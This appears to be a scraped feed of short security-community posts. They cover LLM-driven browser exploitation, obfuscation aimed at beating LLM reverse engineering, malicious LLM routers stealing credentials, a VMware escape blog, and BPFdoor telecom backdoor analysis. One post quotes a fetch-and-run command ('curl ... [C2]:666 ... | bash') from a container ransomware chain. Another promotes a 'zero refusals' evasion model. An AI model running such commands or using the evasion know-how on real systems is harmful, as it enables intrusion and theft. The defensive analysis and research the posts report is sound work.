hacksys

🚨𝐓𝐇𝐄 $𝟏 𝐁𝐋𝐀𝐂𝐊 𝐅𝐑𝐈𝐃𝐀𝐘 𝐒𝐓𝐄𝐀𝐋 𝐈𝐒 𝐇𝐄𝐑𝐄! Get the @cyberwarfarelab Infinity Subscription Plan for just $1/Year. 🔥130+ Labs (AI, Cloud, K8s, APT Labs) ⏳Ends Nov 30 - Go to infinity.cyberwarfare.live - Select "Pro Plan" - Code: BLACKFRIDAY25 #BlackFriday

AI has stopped being a feature and started being the foundation. We're excited about a new wave of startups rebuilding software, services, and silicon— and pushing AI into the physical world. ycombinator.com/rfs

After 11 years of silence at Black Hat, I am delivering a speech today. In memory of a legendary APT Hunter, Mr Sergey Mineev, who passed away 40 days ago. If you cannot attend, here is the write-up: sentinelone.com/labs/fast16-my…

Chinese LLMs can hack better than state-sponsored hackers with properly evolved harness - Kimi K2.5 managed to find and exploit 6 vulnerabilities in browsers: a single page view or an extension install by victims equal full system hijack. Check arxiv.org/abs/2604.20801

LLMs have gotten good enough at reverse engineering to recover source code from obfuscated binaries with real accuracy. So we asked the obvious next question: how fast and cheap is it to use one to build obfuscation specifically designed to beat it? We benchmarked Claude Opus 4.6 against the Tigress obfuscator across 20 targets first, to map its strengths and failure modes. 40% solve rate. Phase 3 multi-layer combos hit 0%, with cost explosions that killed the runs. Then we ran a dev/test/refine loop to build 3 purpose-built obfuscation variants targeting the same crackme, iterating directly against the model's known weaknesses. The finding: LLM-targeted obfuscation is fast and cheap to develop. Context windows, budget caps, and shortcut biases are all exploitable attack surfaces. The arms race just shifted.

Finally, it is published 😁 Making Vulnerable Drivers Exploitable Without Hardware - my latest research on driver vulnerability hardware-gating, explaining the concept of hardware-dependent code and diving deep into creative deployment techniques - software-emulated phantom devices, driver restacking, and forced driver replacement — all explored through the lens of Bring Your Own Vulnerable Driver (BYOVD) attacks: atos.net/wp-content/upl…

A fully local 26B MoE model was built for red teaming and bug hunting. Trained on elite bug reports and real evasion tactics. DPO fine-tuned for hunter mindset. Claude sees your payloads in logs; that's why BugTraceAI Apex 26B local MoE for real red teamers. - executes WAF bypasses with internal thinking blocks. - It enforces deep internal reasoning before generating any output. - Delivers production-grade WAF/EDR evasion with AES-256-GCM obfuscation. - Zero refusals, Trained on real-world elite reports and evasion techniques. Fits in 16.7GB. Runs on RTX 3060. - huggingface.co/BugTraceAI/Bug…

One command. No file written to disk. Full code execution inside a container. curl -fsSL [C2]:666/files/proxy. sh | bash This is how TeamPCP's container ransomware operation starts. Elastic Security Labs walked the full attack chain using Defend for Containers (D4C) to show exactly what runtime signals surface at every stage.

We conducted cyber evaluations of Claude Mythos Preview and found that it is the first model to complete an AISI cyber range end-to-end. 🧵

Technical report released: The AI-Assisted Breach of Mexico’s Government Infrastructure gambit.security/blog-post/a-si…

26 LLM routers are secretly injecting malicious tool calls and stealing creds. One drained our client $500k wallet. We also managed to poison routers to forward traffic to us. Within several hours, we can directly take over ~400 hosts. Check our paper: arxiv.org/abs/2604.08407

1/ Recently an unnamed source shared data exfiltrated from an internal North Korean payment server containing 390 accounts, chat logs, crypto transactions. I spent long hours going through all of it, none of which has ever been publicly released. It revealed an intricate ~$1M/month scheme of fraudulent identities, forged legal documents, and crypto-to-fiat conversion. Enjoy the findings!

Good morning! Just published a blog post exploiting a VMware Guest To Host. A UaF Heap Feng Shui base address leakage to bypass ASLR and a stack-based buffer overflow to achieve RCE. r0keb.github.io/posts/VMware-G…

New blog: We found a sandbox breakout and remote dev tunnel bug in Cursor. Called it NomShub. It was fun making my vscode dev tunnel C2 dashboard pink. na2.hubs.ly/H04GPbw0

LLM Knowledge Bases Something I'm finding very useful recently: using LLMs to build personal knowledge bases for various topics of research interest. In this way, a large fraction of my recent token throughput is going less into manipulating code, and more into manipulating knowledge (stored as markdown and images). The latest LLMs are quite good at it. So: Data ingest: I index source documents (articles, papers, repos, datasets, images, etc.) into a raw/ directory, then I use an LLM to incrementally "compile" a wiki, which is just a collection of .md files in a directory structure. The wiki includes summaries of all the data in raw/, backlinks, and then it categorizes data into concepts, writes articles for them, and links them all. To convert web articles into .md files I like to use the Obsidian Web Clipper extension, and then I also use a hotkey to download all the related images to local so that my LLM can easily reference them. IDE: I use Obsidian as the IDE "frontend" where I can view the raw data, the the compiled wiki, and the derived visualizations. Important to note that the LLM writes and maintains all of the data of the wiki, I rarely touch it directly. I've played with a few Obsidian plugins to render and view data in other ways (e.g. Marp for slides). Q&A: Where things get interesting is that once your wiki is big enough (e.g. mine on some recent research is ~100 articles and ~400K words), you can ask your LLM agent all kinds of complex questions against the wiki, and it will go off, research the answers, etc. I thought I had to reach for fancy RAG, but the LLM has been pretty good about auto-maintaining index files and brief summaries of all the documents and it reads all the important related data fairly easily at this ~small scale. Output: Instead of getting answers in text/terminal, I like to have it render markdown files for me, or slide shows (Marp format), or matplotlib images, all of which I then view again in Obsidian. You can imagine many other visual output formats depending on the query. Often, I end up "filing" the outputs back into the wiki to enhance it for further queries. So my own explorations and queries always "add up" in the knowledge base. Linting: I've run some LLM "health checks" over the wiki to e.g. find inconsistent data, impute missing data (with web searchers), find interesting connections for new article candidates, etc., to incrementally clean up the wiki and enhance its overall data integrity. The LLMs are quite good at suggesting further questions to ask and look into. Extra tools: I find myself developing additional tools to process the data, e.g. I vibe coded a small and naive search engine over the wiki, which I both use directly (in a web ui), but more often I want to hand it off to an LLM via CLI as a tool for larger queries. Further explorations: As the repo grows, the natural desire is to also think about synthetic data generation + finetuning to have your LLM "know" the data in its weights instead of just context windows. TLDR: raw data from a given number of sources is collected, then compiled by an LLM into a .md wiki, then operated on by various CLIs by the LLM to do Q&A and to incrementally enhance the wiki, and all of it viewable in Obsidian. You rarely ever write or edit the wiki manually, it's the domain of the LLM. I think there is room here for an incredible new product instead of a hacky collection of scripts.

mesh-llm: pool compute to run open models. built by @michaelneale at block: docs.anarchai.org

Claude code source code has been leaked via a map file in their npm registry! Code: …a8527898604c1bbb12468b1581d95e.r2.dev/src.zip

Introducing Ligolo-IWA! If you love Ligolo-ng but struggle with proxies, EDRs, or AppLocker policies, this is for you. Ligolo-IWA runs directly from Chromium-based browsers (Edge/Chrome) to bypass standard host restrictions and corporate filters. iwa.ligolo.ng

For my friends who are still using UV and might be a little weary about recent compromises to PyPi packages, stick this in your pyproject.toml. You can let all of those pip users find and report the compromises...

A China-linked cyber threat group has been quietly operating inside telecom networks, prepositioned. Dormant presence meant to be used later. The tool BPFdoor is a Linux backdoor that works at low level in telecommunication core infrastructure. This improves stealth and covert activity. When listing processes or connections, those are not visible (like the 90s and 00s kernel rootkits, so let's call it 26-year-surprising). It can also hide its activation signal inside normal HTTPS network traffic (web browser-like), lets the network's own SSL decryption layer termination decrypt it, and then fires commands. This means that web application firewalls and proxies are effectively bypassed. BPFdoor has been found monitoring SCTP traffic. SCTP is the protocol that carries 4G and 5G signalling between core telecom network functions -- registration requests, subscriber identity, device location updates.

Chinese 🇨🇳 APT group Red Menshen plants kernel-level BPFdoor backdoors in global telecom networks, creating "sleeper cells" for long-term espionage. New variants hide in HTTPS traffic and monitor 4G/5G signaling protocols. Key findings: • BPFdoor evolved from magic packet activation to Layer-7 HTTPS camouflage with RC4-MD5 encryption • Implants target SCTP signaling protocols used in 4G/5G core networks for subscriber tracking • Masquerades as legitimate services like HPE ProLiant hardware daemons and Docker containers • ICMP tunneling enables covert C2 between compromised hosts using 0xFFFFFFFF terminal markers • Affects telecom edge infrastructure: Ivanti VPNs, Cisco/Juniper routers, Fortinet firewalls Attack chain leverages: • Initial access via T1190 exploitation of public-facing telecom appliances • CrossC2 beacons for Linux post-exploitation and lateral movement • TinyShell passive backdoors on boundary devices for persistence • Custom keyloggers with telecom-specific credential lists (usernames like "imsi") DFIR artifacts include raw socket usage, anomalous BPF filters in kernel space, unexpected hardware service processes on non-HPE systems, and HTTPS traffic with fixed-offset padding schemes. Hunt for unusual BPF syscalls, processes mimicking bare-metal hardware services on virtualized systems, and SCTP traffic inspection on non-telecom hosts. #DFIR_Radar